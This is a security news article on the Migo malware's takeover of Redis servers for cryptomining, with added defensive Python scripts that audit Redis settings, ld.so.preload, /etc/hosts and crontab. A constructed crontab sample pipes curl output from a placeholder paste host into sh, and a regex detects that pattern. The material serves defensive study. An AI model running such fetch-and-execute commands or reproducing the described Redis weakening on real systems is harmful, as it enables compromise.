Migo malware disables protection on Redis

Researchers have unearthed the Migo malware, crafted in Go, targeting Redis servers on Linux hosts for cryptocurrency mining. Notably, the malware neutralizes Redis’s security mechanisms to facilitate unobstructed cryptojacking.

Experts at Cado Security, who detected Migo in their honeypots, report that the attackers, upon breaching inadequately secured Redis installations, employ CLI commands to deactivate both the protective measures and server functionality.

Migo malware disables protection on Redis servers

Hackers implement the following modifications to Redis settings:

  • protected-mode: Disabling this setting permits external access to the Redis server, making it easier for attackers to execute malicious commands from remote locations;
  • replica-read-only: Turning off this feature allows data to be written directly to replicas, enabling the further spread of malicious payloads or data alterations;
  • aof-rewrite-incremental-fsync: Deactivating this option increases the IO load during the file rewriting process in AOF (append-only file) mode, which the researchers suggest helps attackers evade detection by creating atypical IO patterns that distract defenses;
  • rdb-save-incremental-fsync: Disabling this can degrade performance when saving RDB snapshots, potentially facilitating denial of service (DoS) attacks or manipulation of persistence.
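The four settings above can be checked against a known-good baseline without any third-party tooling. The following is an added detection example, not code from Cado Security or from the article; it parses either redis.conf text or the flat key/value list that Redis's CONFIG GET returns and reports every setting that has drifted from its hardened value. The expected values are assumed to be the Redis defaults and should be adjusted to your own baseline; the sample configuration at the bottom is constructed for illustration.

```python
from typing import Dict, List, Tuple

# Settings the article reports Migo weakening, with the value a hardened
# server should hold. Assumption: these are the Redis defaults; compare
# against your own baseline before alerting.
EXPECTED: Dict[str, str] = {
    "protected-mode": "yes",
    "replica-read-only": "yes",
    "aof-rewrite-incremental-fsync": "yes",
    "rdb-save-incremental-fsync": "yes",
}


def parse_redis_conf(text: str) -> Dict[str, str]:
    """Parse redis.conf-style lines ('key value', '#' comment lines) into a dict.

    Redis ignores only lines that *start* with '#', and a later occurrence of a
    key overrides an earlier one, so this parser does the same.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip().strip('"') if len(parts) > 1 else ""
        settings[key] = value
    return settings


def parse_config_get(flat: List[str]) -> Dict[str, str]:
    """Turn the flat [key, value, key, value, ...] reply of CONFIG GET into a dict."""
    if len(flat) % 2:
        raise ValueError("CONFIG GET reply must have an even number of elements")
    return {flat[i].lower(): flat[i + 1] for i in range(0, len(flat), 2)}


def audit_redis_settings(settings: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (key, observed, expected) for every setting that deviates from EXPECTED.

    A key absent from the parsed input is treated as holding the Redis default,
    so only explicit overrides produce a finding.
    """
    findings = []
    for key, expected in EXPECTED.items():
        observed = settings.get(key)
        if observed is not None and observed.lower() != expected:
            findings.append((key, observed, expected))
    return findings


# Constructed sample: a redis.conf after the tampering described above.
SAMPLE_CONF = """
# constructed sample, not a real configuration
bind 0.0.0.0
protected-mode no
replica-read-only no
aof-rewrite-incremental-fsync no
rdb-save-incremental-fsync yes
"""

if __name__ == "__main__":
    for key, observed, expected in audit_redis_settings(parse_redis_conf(SAMPLE_CONF)):
        print(f"ALERT {key}: observed {observed!r}, expected {expected!r}")
```

Running the audit periodically against the live configuration (via CONFIG GET, which reflects runtime changes made with CONFIG SET) rather than only against the file on disk matters here, because the tampering described takes place over the CLI and need not touch redis.conf at all.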

Subsequently, the attackers set up a cron job to retrieve a script from Pastebin, which extracts the primary Migo payload (/tmp/.migo) from Transfer.sh for execution as a background process.


According to the researchers, Migo's primary role is to fetch, install, and execute a tailored version of the XMRig miner (used to mine Monero) from GitHub's CDN on the compromised host. Moreover, Migo employs a user-mode rootkit to conceal its processes and files, thereby obstructing the malware's detection and removal.

The malware also alters the /etc/ld.so.preload file to modify the behavior of system utilities, maintaining lists of processes and files whose existence it hides from them.

The attack concludes with Migo setting up firewall rules to restrict outgoing traffic to certain IP addresses, executing commands to disable SELinux, and identifying and disabling cloud providers' monitoring agents. It also removes rival miners and other malware from the server. Furthermore, it modifies the /etc/hosts file to block communication with cloud service providers, further concealing its activities.
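The persistence and concealment steps described above (the cron job that fetches a remote script, the /etc/ld.so.preload modification and the sinkholed /etc/hosts entries) each leave a simple, file-based trace. The following is an added host-audit example, not code from Cado Security or from the article; it takes the text of those three files and returns the entries a defender should look at. All sample file contents and hostnames are constructed placeholders.

```python
import re
from typing import List, Tuple


def audit_ld_preload(text: str) -> List[str]:
    """Return every library path listed in /etc/ld.so.preload.

    On most systems the file is absent or empty, so any entry merits review:
    a user-mode rootkit of the kind described above relies on this file to
    load itself into every dynamically linked process.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            entries.append(line)
    return entries


def audit_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs that pin a non-loopback name to a sinkhole.

    Mapping a provider's hostname to 0.0.0.0 or the loopback address is how
    /etc/hosts is used to cut the host off from its cloud provider's endpoints.
    """
    sinkholes = {"0.0.0.0", "127.0.0.1", "::1"}
    local_names = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # /etc/hosts allows trailing comments
        if not line:
            continue
        fields = line.split()
        addr, names = fields[0], fields[1:]
        if addr in sinkholes:
            findings.extend((addr, n) for n in names if n.lower() not in local_names)
    return findings


# Cron lines that download and execute remote content, or run hidden files
# under /tmp, are the shape of the loader described in the article.
_SUSPECT_CRON = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b|/tmp/\.")


def audit_crontab(text: str) -> List[str]:
    """Return crontab lines that fetch-and-execute remote content or run hidden /tmp files."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and _SUSPECT_CRON.search(line):
            hits.append(line)
    return hits


# Constructed samples; hostnames and paths are placeholders, not real indicators.
SAMPLE_LD_PRELOAD = "/usr/local/lib/libexample-hook.so\n"
SAMPLE_HOSTS = """
127.0.0.1 localhost
::1       localhost ip6-localhost ip6-loopback
0.0.0.0   metadata.example-cloud.invalid   # constructed sinkhole entry
"""
SAMPLE_CRONTAB = """
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -fsSL https://paste.example.invalid/raw/placeholder | sh
"""

if __name__ == "__main__":
    print("ld.so.preload:", audit_ld_preload(SAMPLE_LD_PRELOAD))
    print("hosts:", audit_hosts(SAMPLE_HOSTS))
    print("crontab:", audit_crontab(SAMPLE_CRONTAB))
```

Because the rootkit hooks user-mode utilities, read these files from a trusted context (for example, a forensic image or a statically linked tool copied onto the host) rather than through `cat` or `ls` on a suspect machine, where the preloaded library may filter what those commands return.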
